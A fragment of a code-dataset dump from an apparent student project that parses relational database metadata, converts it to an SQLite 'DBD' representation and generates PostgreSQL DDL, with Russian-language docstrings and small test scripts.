"text": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nCURRENT_DBD_VERSION = '3.1'\n\nSQL_DBD_PRE_INIT = \"\"\"\n CREATE TABLE dbd$schemas (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL\n ,name VARCHAR NOT NULL\n ,fulltext_engine VARCHAR NULL\n ,version VARCHAR NULL\n ,description VARCHAR NULL\n );\n\"\"\"\n\nSQL_DBD_DOMAINS_TABLE_INIT = \"\"\"\n CREATE TABLE dbd$domains (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,name VARCHAR UNIQUE DEFAULT(NULL) NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,data_type_id INTEGER NOT NULL \n ,length INTEGER DEFAULT(NULL) NULL \n ,char_length INTEGER DEFAULT(NULL) NULL \n ,precision INTEGER DEFAULT(NULL) NULL \n ,scale INTEGER DEFAULT(NULL) NULL \n ,width INTEGER DEFAULT(NULL) NULL \n ,align CHAR DEFAULT(NULL) NULL \n ,show_null BOOLEAN DEFAULT(NULL) NULL \n ,show_lead_nulls BOOLEAN DEFAULT(NULL) NULL \n ,thousands_separator BOOLEAN DEFAULT(NULL) NULL \n ,summable BOOLEAN DEFAULT(NULL) NULL \n ,case_sensitive BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE\n );\n \n CREATE INDEX \"idx.FZX832TFV\" ON dbd$domains(data_type_id);\n CREATE INDEX \"idx.4AF9IY0XR\" ON dbd$domains(uuid);\n\"\"\"\n\nSQL_DBD_TABLES_TABLE_INIT = \"\"\"\n CREATE TABLE dbd$tables (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,schema_id INTEGER DEFAULT(NULL) NULL \n ,name VARCHAR UNIQUE NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,can_add BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,can_delete BOOLEAN DEFAULT(NULL) NULL \n ,temporal_mode VARCHAR DEFAULT(NULL) NULL \n ,means VARCHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n ); \n \n CREATE INDEX \"idx.GCOFIBEBJ\" ON dbd$tables(name);\n CREATE INDEX \"idx.2J02T9LQ7\" ON dbd$tables(uuid);\n\"\"\"\n\nSQL_DBD_TABLES_INIT = \"\"\"\n CREATE TABLE dbd$fields (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,name VARCHAR NOT NULL \n ,russian_short_name VARCHAR NOT NULL \n ,description VARCHAR DEFAULT(NULL) NULL \n ,domain_id INTEGER NOT NULL \n ,can_input BOOLEAN DEFAULT(NULL) NULL \n ,can_edit BOOLEAN DEFAULT(NULL) NULL \n ,show_in_grid BOOLEAN DEFAULT(NULL) NULL \n ,show_in_details BOOLEAN DEFAULT(NULL) NULL\n ,is_mean BOOLEAN DEFAULT(NULL) NULL \n ,autocalculated BOOLEAN DEFAULT(NULL) NULL \n ,required BOOLEAN DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE\n );\n \n CREATE INDEX \"idx.7UAKR6FT7\" ON dbd$fields(table_id);\n CREATE INDEX \"idx.7HJ6KZXJF\" ON dbd$fields(position);\n CREATE INDEX \"idx.74RSETF9N\" ON dbd$fields(name);\n CREATE INDEX \"idx.6S0E8MWZV\" ON dbd$fields(domain_id);\n CREATE INDEX \"idx.88KWRBHA7\" ON dbd$fields(uuid);\n \n \n CREATE TABLE dbd$constraints (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,constraint_type CHAR DEFAULT(NULL) NULL \n ,reference INTEGER DEFAULT(NULL) NULL \n ,unique_key_id INTEGER DEFAULT(NULL) NULL \n ,has_value_edit BOOLEAN DEFAULT(NULL) NULL \n ,cascading_delete BOOLEAN DEFAULT(NULL) NULL \n ,expression VARCHAR DEFAULT(NULL) NULL\n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n );\n \n CREATE INDEX \"idx.6F902GEQ3\" ON dbd$constraints(table_id);\n CREATE INDEX \"idx.6SRYJ35AJ\" ON dbd$constraints(name);\n CREATE INDEX \"idx.62HLW9WGB\" ON dbd$constraints(constraint_type);\n CREATE INDEX \"idx.5PQ7Q3E6J\" ON dbd$constraints(reference);\n CREATE INDEX \"idx.92GH38TZ4\" ON dbd$constraints(unique_key_id);\n CREATE INDEX \"idx.6IOUMJINZ\" ON dbd$constraints(uuid);\n\n\n CREATE TABLE dbd$constraint_details (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,constraint_id INTEGER NOT NULL \n ,position INTEGER NOT NULL \n ,field_id INTEGER NOT NULL \n );\n \n CREATE INDEX \"idx.5CYTJWVWR\" ON dbd$constraint_details(constraint_id);\n CREATE INDEX \"idx.507FDQDMZ\" ON dbd$constraint_details(position);\n CREATE INDEX \"idx.4NG17JVD7\" ON dbd$constraint_details(field_id);\n\n\n CREATE TABLE dbd$indices (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,table_id INTEGER NOT NULL NULL \n ,name VARCHAR DEFAULT(NULL) NULL \n ,local BOOLEAN DEFAULT(0) NULL \n ,kind CHAR DEFAULT(NULL) NULL \n ,uuid VARCHAR UNIQUE NOT NULL COLLATE NOCASE \n );\n \n CREATE INDEX \"idx.12XXTJUYZ\" ON dbd$indices(table_id);\n CREATE INDEX \"idx.6G0KCWN0R\" ON dbd$indices(name);\n CREATE INDEX \"idx.FQH338PQ7\" ON dbd$indices(uuid);\n\n\n CREATE TABLE dbd$index_details (\n id INTEGER PRIMARY KEY AUTOINCREMENT DEFAULT(NULL) NULL\n ,index_id INTEGER NOT NULL\n ,position INTEGER NOT NULL\n ,field_id INTEGER DEFAULT(NULL) NULL\n ,expression VARCHAR DEFAULT(NULL) NULL\n ,descend BOOLEAN DEFAULT(NULL) NULL \n );\n \n CREATE INDEX \"idx.H1KFOWTCB\" ON dbd$index_details(index_id);\n CREATE INDEX \"idx.BQA4HXWNF\" ON dbd$index_details(field_id);\n \n\n CREATE TABLE dbd$data_types (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL\n ,type_id VARCHAR UNIQUE NOT NULL\n );\n\n INSERT INTO dbd$data_types(type_id) VALUES ('STRING');\n INSERT INTO dbd$data_types(type_id) VALUES ('SMALLINT');\n INSERT INTO dbd$data_types(type_id) VALUES ('INTEGER');\n INSERT INTO dbd$data_types(type_id) VALUES ('WORD');\n INSERT INTO dbd$data_types(type_id) VALUES ('BOOLEAN');\n INSERT INTO dbd$data_types(type_id) VALUES ('FLOAT');\n INSERT INTO dbd$data_types(type_id) VALUES ('CURRENCY');\n INSERT INTO dbd$data_types(type_id) VALUES ('BCD');\n INSERT INTO dbd$data_types(type_id) VALUES ('FMTBCD');\n INSERT INTO dbd$data_types(type_id) VALUES ('DATE');\n INSERT INTO dbd$data_types(type_id) VALUES ('TIME');\n INSERT INTO dbd$data_types(type_id) VALUES ('DATETIME');\n INSERT INTO dbd$data_types(type_id) VALUES ('TIMESTAMP');\n INSERT INTO dbd$data_types(type_id) VALUES ('BYTES');\n INSERT INTO dbd$data_types(type_id) VALUES ('VARBYTES');\n INSERT INTO dbd$data_types(type_id) VALUES ('BLOB');\n INSERT INTO dbd$data_types(type_id) VALUES ('MEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('GRAPHIC');\n INSERT INTO dbd$data_types(type_id) VALUES ('FMTMEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('FIXEDCHAR');\n INSERT INTO dbd$data_types(type_id) VALUES ('WIDESTRING');\n INSERT INTO dbd$data_types(type_id) VALUES ('LARGEINT');\n INSERT INTO dbd$data_types(type_id) VALUES ('COMP');\n INSERT INTO dbd$data_types(type_id) VALUES ('ARRAY');\n INSERT INTO dbd$data_types(type_id) VALUES ('FIXEDWIDECHAR');\n INSERT INTO dbd$data_types(type_id) VALUES ('WIDEMEMO');\n INSERT INTO dbd$data_types(type_id) VALUES ('CODE');\n INSERT INTO dbd$data_types(type_id) VALUES ('RECORDID');\n INSERT INTO dbd$data_types(type_id) VALUES ('SET');\n INSERT INTO dbd$data_types(type_id) VALUES ('PERIOD');\n INSERT INTO dbd$data_types(type_id) VALUES ('BYTE');\n\"\"\" % {'dbd_version': CURRENT_DBD_VERSION}\n\nSQL_DBD_VIEWS_INIT = \"\"\"\n CREATE VIEW dbd$view_fields \n AS\n SELECT\n sch.name AS \"schema\"\n ,tab.name AS \"table\"\n ,fld.position AS \"position\"\n ,fld.name AS \"name\"\n ,fld.russian_short_name AS \"russian_short_name\"\n ,fld.description AS \"description\"\n ,type.type_id AS \"type_id\"\n ,dom.length AS \"length\"\n ,dom.char_length AS \"char_length\"\n ,dom.width AS \"width\"\n ,dom.align AS \"align\"\n ,dom.precision AS \"precision\"\n ,dom.scale AS \"scale\"\n ,dom.show_null AS \"show_null\"\n ,dom.show_lead_nulls AS \"show_lead_nulls\"\n ,dom.thousands_separator AS \"thousands_separator\"\n ,dom.summable AS \"summable\"\n ,dom.case_sensitive AS \"case_sensitive\"\n ,fld.can_input AS \"can_input\"\n ,fld.can_edit AS \"can_edit\"\n ,fld.show_in_grid AS \"show_in_grid\"\n ,fld.show_in_details AS \"show_in_details\"\n ,fld.is_mean AS \"is_mean\"\n ,fld.autocalculated AS \"autocalculated\"\n ,fld.required AS \"required\"\n FROM dbd$fields AS fld\n INNER JOIN dbd$tables AS tab\n ON fld.table_id = tab.id\n INNER JOIN dbd$domains AS dom\n ON fld.domain_id = dom.id\n INNER JOIN dbd$data_types AS type\n ON dom.data_type_id = type.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n bd$tables.name\n ,bd$fields.position;\n \n \n CREATE VIEW dbd$view_domains \n AS\n SELECT\n dom.id\n ,dom.name\n ,dom.description\n ,type.type_id\n ,dom.length\n ,dom.char_length\n ,dom.width\n ,dom.align\n ,dom.summable\n ,dom.precision\n ,dom.scale\n ,dom.show_null\n ,dom.show_lead_nulls\n ,dom.thousands_separator\n ,dom.case_sensitive \"case_sensitive\"\n FROM dbd$domains AS dom\n INNER JOIN dbd$data_types AS type\n ON dom.data_type_id = type.id\n ORDER BY dom.id;\n \n \n CREATE VIEW dbd$view_constraints \n AS\n SELECT\n con.id AS \"constraint_id\"\n ,con.constraint_type AS \"constraint_type\"\n ,det.position AS \"position\"\n ,sch.name AS \"schema\"\n ,tab.name AS \"table_name\"\n ,fld.name AS \"field_name\"\n ,ref.name AS \"reference\"\n FROM dbd$constraint_details AS det\n INNER JOIN dbd$constraints AS con\n ON det.constraint_id = con.id\n INNER JOIN dbd$tables AS tab\n ON con.table_id = tab.id\n LEFT JOIN dbd$tables AS ref\n ON con.reference = ref.id\n LEFT JOIN dbd$fields AS fld\n ON det.field_id = fld.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n constraint_id\n ,position;\n \n \n CREATE VIEW dbd$view_indices \n AS\n SELECT\n ind.id AS \"index_id\"\n ,ind.name AS \"index_name\"\n ,sch.name AS \"schema\"\n ,tab.name AS \"table_name\"\n ,ing.local\n ,ing.kind\n ,det.position\n ,fld.name AS \"field_name\"\n ,det.expression\n ,det.descend\n FROM dbd$index_details AS det\n INNER JOIN dbd$indices AS ind\n ON det.index_id = ind.id\n INNER JOIN dbd$tables AS tab\n ON ind.table_id = tab.id\n LEFT JOIN dbd$fields AS fld\n ON det.field_id = fld.id\n LEFT JOIN dbd$schemas AS sch\n ON tab.schema_id = sch.id\n ORDER BY\n dbd$tables.name\n ,dbd$indices.name\n ,dbd$index_details.position;\n\"\"\"\n\nBEGIN_TRANSACTION = \"\"\"\n PRAGMA FOREIGN_KEYS = ON;\n BEGIN TRANSACTION;\n\"\"\"\n\nCOMMIT = \"\"\"\nCOMMIT;\n\"\"\"\n\nSQL_DBD_Init = BEGIN_TRANSACTION + SQL_DBD_PRE_INIT + SQL_DBD_DOMAINS_TABLE_INIT + \\\n SQL_DBD_TABLES_TABLE_INIT + SQL_DBD_TABLES_INIT + SQL_DBD_VIEWS_INIT + COMMIT"
},
{
"alpha_fraction": 0.487964391708374,
"alphanum_fraction": 0.4886910617351532,
"avg_line_length": 41.01526641845703,
"blob_id": "85d7e58a08aaa6928ac434a48f3222ae7373eaf9",
"content_id": "12a453ccf84dc8192d27088f6814c1acd6380c7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12119,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 262,
"path": "/ram_repr/ram_to_dbd.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport errno\nimport os\nimport sqlite3\nimport uuid\n\nfrom dbd_repr.dbd_structure import BEGIN_TRANSACTION\nfrom dbd_repr.dbd_structure import COMMIT\nfrom dbd_repr.dbd_structure import SQL_DBD_Init\nfrom dbd_repr.dbd_temp_structure import SQL_TMP_INIT\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DbdUploadConnection:\n \"\"\" Класс, реализующий подключение к базе SQLite лдя создания DBD-представления схемы БД.\n \"\"\"\n def __init__(self, config_file: str, db_file: str):\n self.config = configparser.ConfigParser()\n self.config.read(config_file, 'utf-8')\n self._drop_if_exists(db_file)\n self.conn = sqlite3.connect(db_file)\n self.cursor = self.conn.cursor()\n\n def __exit__(self):\n self.conn.close()\n\n @staticmethod\n def _drop_if_exists(file_name: str):\n \"\"\" Удалить файл, если он существует.\n\n :param file_name: Путь к удаляемому файлу.\n :return: None\n \"\"\"\n try:\n os.remove(file_name)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n\n def create_dbd_repr(self):\n \"\"\" Создать основные источники для струтктурных элементов.\n\n :return: None\n \"\"\"\n self.cursor.executescript(SQL_DBD_Init)\n\n def create_tmp_dbd_repr(self):\n \"\"\" Создать временные источники для структурных элементов.\n\n :return: None\n \"\"\"\n self.cursor.executescript(SQL_TMP_INIT)\n\n def fill_main_tables(self):\n \"\"\" Запустить скрипт переливки данных из временных источников в основные.\n\n :return: None\n \"\"\"\n self.cursor.executescript(self.config.get('PROCESSING', 'fill_main_tables'))\n\n def upload_schema(self, schema: Schema):\n \"\"\" Выгрузить данные из объекта схемы во временных источник схем.\n\n :param schema: объект схемы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'schema')\n self.cursor.execute(query, {\n 'name': schema.name,\n 'fulltext_engine': schema.fulltext_engine,\n 'version': schema.version,\n 'description': schema.description\n }\n )\n\n def upload_domain(self, domain: Domain):\n \"\"\" Выгрузить данные из объекта домена во временный источник доменов.\n\n :param domain: объект домена\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'domain')\n self.cursor.execute(query, {\n 'name': domain.name,\n 'description': domain.description,\n 'data_type_name': domain.type,\n 'length': domain.length,\n 'char_length': domain.char_length,\n 'precision': domain.precision,\n 'scale': domain.scale,\n 'width': domain.width,\n 'align': domain.align,\n 'show_null': domain.show_null,\n 'show_lead_nulls': domain.show_lead_nulls,\n 'thousands_separator': domain.thousands_separator,\n 'summable': domain.summable,\n 'case_sensitive': domain.case_sensitive,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_table(self, table: Table, schema: Schema):\n \"\"\" Выгрузить данные из объекта таблицы во временный источник таблиц.\n\n :param table: объект таблицы\n :param schema: объект схемы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'table')\n self.cursor.execute(query, {\n 'schema_name': schema.name,\n 'name': table.name,\n 'description': table.description,\n 'can_add': table.add,\n 'can_edit': table.edit,\n 'can_delete': table.delete,\n 'temporal_mode': table.temporal_mode,\n 'means': table.means,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_field(self, field: Field, table: Table):\n \"\"\" Выгрузить данные из объекта поля во временный источник полей.\n\n :param field: объект поля\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'field')\n self.cursor.execute(query, {\n 'table_name': table.name,\n 'position': list(table.fields.values()).index(field),\n 'name': field.name,\n 'russian_short_name': field.rname,\n 'description': field.description,\n 'domain_name': field.domain,\n 'can_input': field.input,\n 'can_edit': field.edit,\n 'show_in_grid': field.show_in_grid,\n 'show_in_details': field.show_in_details,\n 'is_mean': field.is_mean,\n 'autocalculated': field.autocalculated,\n 'required': field.required,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_constraint(self, constraint: Constraint, table: Table):\n \"\"\" Выгрузить данные из объекта ограничения во временный источника ограничений.\n\n :param constraint: объект ограничения\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'constraint')\n self.cursor.execute(query, {\n 'id': id(constraint),\n 'table_name': table.name,\n 'name': constraint.name,\n 'constraint_type': constraint.kind,\n 'reference': constraint.reference,\n 'unique_key_name': constraint.constraint,\n 'has_value_edit': constraint.has_value_edit,\n 'cascading_delete': constraint.cascading_delete,\n 'expression': constraint.expression,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_index(self, index: Index, table: Table):\n \"\"\" Выгрузить данные из объекта индекса во временный источник индексов.\n\n :param index: объект индекса\n :param table: объект таблицы\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'index')\n self.cursor.execute(query, {\n 'id': id(index),\n 'table_name': table.name,\n 'name': index.name,\n 'local': index.local,\n 'kind': index.kind,\n 'uuid': uuid.uuid1().hex\n }\n )\n\n def upload_constraint_detail(self, detail: ConstraintDetail, constraint: Constraint):\n \"\"\" Выгрузить данные из объекта детали ограничения во временный источник деталей ограничений.\n\n :param detail: объект детали ограничения.\n :param constraint: объект ограничения.\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'constraint_detail')\n self.cursor.execute(query, {\n 'constraint_id': id(constraint),\n 'position': constraint.details.index(detail),\n 'field_name': detail.value\n }\n )\n\n def upload_index_detail(self, detail: IndexDetail, index: Index):\n \"\"\" Выгрузить данные из объекта детали индекса во временный источник деталей индексов.\n\n :param detail: объект детали индекса\n :param index: объект индекса\n :return: None\n \"\"\"\n query = self.config.get('UPLOADING', 'index_detail')\n self.cursor.execute(query, {\n 'index_id': id(index),\n 'position': index.details.index(detail),\n 'field_name': detail.value,\n 'expression': detail.expression,\n 'descend': detail.descend\n }\n )\n\n\ndef upload(schemas: list, db_file: str):\n \"\"\" Произвести выгрузку RAM-представления, передаваемого в виде списка схем, в базу SQLite по указанному пути,\n сформировав тем самым DBD-представление схемы БД.\n\n :param schemas: список объектов схем\n :param db_file: путь к файлу базы данных\n :return: None\n \"\"\"\n conn = DbdUploadConnection('dbd_queries_sqlite.cfg', db_file)\n conn.create_dbd_repr()\n conn.create_tmp_dbd_repr()\n\n conn.cursor.executescript(BEGIN_TRANSACTION)\n\n for schema in schemas:\n conn.upload_schema(schema)\n for domain in schema.domains.values():\n conn.upload_domain(domain)\n for table in schema.tables.values():\n conn.upload_table(table, schema)\n for field in table.fields.values():\n conn.upload_field(field, table)\n for constraint in table.constraints:\n conn.upload_constraint(constraint, table)\n for detail in constraint.details:\n conn.upload_constraint_detail(detail, constraint)\n for index in table.indexes:\n conn.upload_index(index, table)\n for detail in index.details:\n conn.upload_index_detail(detail, index)\n\n conn.cursor.execute(COMMIT)\n\n conn.fill_main_tables()\n\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 63.79999923706055,
"blob_id": "b9dc1d73cbb1468814f22c8d663017ec3f8bf305",
"content_id": "5e8eda559093f2f0830c68db8e27dd59c540ccfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 5,
"path": "/_test/test_ddl_applying.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from db_deploy.ddl_applying import DbCreationConnection\n\ndb = DbCreationConnection('../database.cfg', '../dbd_queries_sqlite.cfg')\ndb.deploy(db_name='Collective', repr_file=r'C:\\Studying\\Коллективная разработка ПО\\dbd_repr.db')\ndb.deploy(db_name='development',repr_file=r'C:\\Studying\\Коллективная разработка ПО\\prjadm.xml')\n"
},
{
"alpha_fraction": 0.5187810063362122,
"alphanum_fraction": 0.5196314454078674,
"avg_line_length": 36.328041076660156,
"blob_id": "737d1a457a5cad90881f092ed31e4fb20a9f7f6a",
"content_id": "c3f892919424b55231916e422542a9a4ecb9eaa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7687,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 189,
"path": "/db_deploy/ddl_generator.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы генерации DDL-инструкций для PostgreSQL\nиз RAM-представления схемы БД, основываясь на шаблонах из файла.\n\"\"\"\nimport configparser\nimport string\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\n\n\nclass DdlGenerator:\n \"\"\" Класс-генератор DDL-инструкций для создания элеменов БД, исходя из представления\n метаданных в ОП.\n \"\"\"\n def __init__(self):\n self.config = configparser.ConfigParser()\n self.config_file = open('../ddl_templates.cfg', encoding='utf-8')\n self.config.read_file(self.config_file)\n self.templates = self.config['TEMPLATES']\n\n def __exit__(self):\n self.config_file.close()\n\n def create_schema_dll(self, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания схемы в базу PostgreSQL.\n\n :param schema: объект схемы.\n :return: str\n \"\"\"\n return string.Template(self.templates.get('schema'))\\\n .substitute(\n schema_name=schema.name\n )\n\n def create_domain_dll(self, domain: Domain, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания схемы в базе PostgreSQL.\n\n :param domain: объект домена\n :param schema: объект схемы\n :return: str\n \"\"\"\n return string.Template(self.templates.get('domain'))\\\n .substitute(\n schema_name=schema.name,\n domain_name=domain.name,\n data_type=self._get_postgres_type(domain),\n description=domain.description\n )\n\n def create_table_ddl(self, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию создания таблицы в базе данных PostgreSQL.\n\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n fields = '\\n,'.join(\n [\n self.create_field_ddl(field, schema)\n for field in table.fields.values()\n ]\n )\n return string.Template(self.templates.get('table'))\\\n .substitute(\n schema_name=schema.name,\n table_name=table.name,\n fields=fields\n )\n\n def create_field_ddl(self, field: Field, schema: Schema):\n \"\"\" Создать DDL-инструкцию дял создания поля в БД.\n\n :param field: объект поля.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n return string.Template(self.templates.get('field'))\\\n .substitute(\n field_name=field.name,\n field_type=field.domain,\n schema_name=schema.name\n )\n\n def create_constraint_ddl(self, constraint: Constraint, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию для создания ограничения в БД.\n\n :param constraint: объект ограничения.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n details = []\n for det in constraint.details:\n detail = r'\"' + det.value + r'\"'\n details.append(detail)\n\n if constraint.kind.upper() == 'PRIMARY':\n definition = string.Template(self.templates.get('primary'))\\\n .substitute(\n values=', '.join(details)\n )\n\n elif constraint.kind.upper() == 'FOREIGN':\n definition = string.Template(self.templates.get('foreign'))\\\n .substitute(\n values=', '.join(details),\n reference_schema=schema.name,\n reference_table=constraint.reference,\n constraint_name=constraint.name if constraint.name else ''\n )\n else:\n return ''\n\n return string.Template(self.templates.get('constraint'))\\\n .substitute(\n schema_name=schema.name,\n table_name=table.name,\n constraint_definition=definition\n )\n\n def create_index_ddl(self, index: Index, table: Table, schema: Schema):\n \"\"\" Создать DDL-инструкцию для создания индекса в БД.\n\n :param index: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: str\n \"\"\"\n details = []\n for det in index.details:\n detail = r'\"' + det.value + r'\"'\n if det.expression:\n detail += ' (' + det.expression + ')'\n if not det.descend:\n detail += ' ASC'\n else:\n detail += det.descend.upper()\n details.append(detail)\n\n if len(details) == 0:\n return ''\n\n return string.Template(self.templates.get('index'))\\\n .substitute(\n index_name='\"' + index.name + table.name + '\"' if index.name else '',\n table_name=table.name,\n schema_name=schema.name,\n fields=', '.join(details)\n )\n\n def _get_postgres_type(self, domain):\n \"\"\" Получить строку, представляющую тип домена представления метаданны в ОП.\n\n :param domain: объект домена.\n :return: str\n \"\"\"\n if domain.type.upper() in ['STRING', 'MEMO', 'SYSNAME', 'NVARCHAR', 'VARCHAR']:\n if domain.char_length and int(domain.char_length) > 0:\n return string.Template(self.templates.get('domain_type'))\\\n .substitute(\n type_name='varchar',\n props=domain.char_length\n )\n else:\n return 'varchar'\n elif domain.type.upper() in ['UNIQUEIDENTIFIER', 'MONEY', 'SQL_VARIANT', 'BIT']:\n return 'varchar(200)'\n elif domain.type.upper() in ['NTEXT', 'NCHAR', 'CHAR', 'BLOB', 'VARBINARY', 'BINARY', 'IMAGE']:\n return 'text'\n elif domain.type.upper() == 'BOOLEAN':\n return 'BOOLEAN'\n elif domain.type.upper() == 'DATE':\n return 'date'\n elif domain.type.upper() == 'TIME':\n return 'time'\n elif domain.type.upper() in ['LARGEINT', 'CODE', 'BIGINT']:\n return 'bigint'\n elif domain.type.upper() in ['WORD', 'BYTE', 'SMALLINT', 'INT', 'TINYINT']:\n return 'INTEGER'\n elif domain.type.upper() in ['FLOAT', 'REAL']:\n return 'REAL'\n elif domain.type.upper() in ['DATETIME']:\n return 'timestamp'\n print(domain.type.upper())\n return ''\n"
},
{
"alpha_fraction": 0.665181040763855,
"alphanum_fraction": 0.6674094796180725,
"avg_line_length": 34.19607925415039,
"blob_id": "9154968230da9d86be48cd92037b0a65d67b30ff",
"content_id": "e873bccf00c0d0a23d41fbbade6f948fc81866d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2418,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 51,
"path": "/_test/test_xml_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Тестовый модуль, реализующий последовательный запуск создания представления базы в RAM и выгрузки данного\nпредставления назад в XML. При этом производится сверка результата выгрузки с исходным файлом.\n\"\"\"\n\nfrom codecs import open as _open\n\nfrom ram_repr.ram_to_xml import write\nfrom xml_repr.xml_to_ram import read\n\n\ndef compare(source, result):\n \"\"\" Построчно сравнить файлы, игнорируя незначащие отступы.\n\n :param source: путь к исходному файлу.\n :param result: путь к результирующему файлу.\n :return: признак равенства файлов.\n \"\"\"\n with _open(result, 'r', 'utf8') as source_file, \\\n _open(source, 'r', 'utf8') as result_file:\n equal = True\n for source_line in source_file:\n result_line = result_file.readline()\n if source_line.split() != result_line.split():\n print('Расхождение:')\n print(source_line)\n print(result_line)\n equal = False\n return equal\n\n\ndef execute(input, output):\n \"\"\" Запустить созадние объектного представления базы и его выгрузку в файл с последующим сравнением.\n\n :param input: исходный файл с представлением базы в XML.\n :param output: путь к файлу, в который необходимо произвести выгрузку.\n :return: None\n \"\"\"\n schemas = read(input)\n for schema in schemas:\n write(schema, output)\n if compare(input, output):\n print('Файлы успешно прошли проверку на идентичность.')\n else:\n print('Файлы не прошли проверку на идентичность.')\n\n\nexecute('C:\\\\Studying\\\\Коллективная разработка ПО\\\\tasks.xml',\n 'C:\\\\Studying\\\\Коллективная разработка ПО\\\\tasks1.xml')\n\nexecute('C:\\\\Studying\\\\Коллективная разработка ПО\\\\prjadm.xml',\n 'C:\\\\Studying\\\\Коллективная разработка ПО\\\\prjadm1.xml')\n"
},
{
"alpha_fraction": 0.44484731554985046,
"alphanum_fraction": 0.4454198479652405,
"avg_line_length": 49.38461685180664,
"blob_id": "0a5ecad814eb0a04bfbfb6217f49170ea10775b8",
"content_id": "c4597589f54ebe401ab243f5f5c0826417f2760c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5310,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 104,
"path": "/dbd_repr/dbd_temp_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
